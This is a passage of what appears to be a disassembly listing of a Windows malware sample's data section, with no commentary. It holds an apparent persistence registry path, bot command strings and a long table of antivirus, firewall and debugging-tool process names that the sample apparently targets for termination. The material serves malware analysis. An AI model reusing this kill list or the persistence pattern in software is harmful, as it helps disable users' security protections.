dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
dword_42B3C8 dd 80000002h ; DATA XREF: sub_40213F+24�r
off_42B3CC dd offset aSoftwareMicr_0 ; DATA XREF: sub_40213F+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42C010h, 80000001h, 42C048h
dword_42B3E0 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_40398A+9C�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42B42C dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_40398A+DA�o
; ---------------------------------------------------------------------------
loc_42B448: ; DATA XREF: sub_40398A+10F�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42B45C dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40398A+138�o
off_42B470 dd offset aAdd ; DATA XREF: sub_40776C+59�r
; sub_4077E4+4A�r ...
; "Add"
off_42B474 dd offset aAdded ; DATA XREF: sub_40776C+2D�r
; sub_4077E4+7C�r ...
; "Added"
dword_42B478 dd 0 ; DATA XREF: sub_40776C+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 422590h, 422588h, 2, 42257Ch, 422570h, 3, 0
dword_42B4C8 dd 7530h ; DATA XREF: sub_4085DF+14�r
align 10h
off_42B4D0 dd offset aAckwin32_exe ; DATA XREF: sub_4081CA:loc_408291�r
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe_0 ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSvshost32_exe ; "SVSHOST32.EXE"
dd offset aUpd32_exe ; "UPD32.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
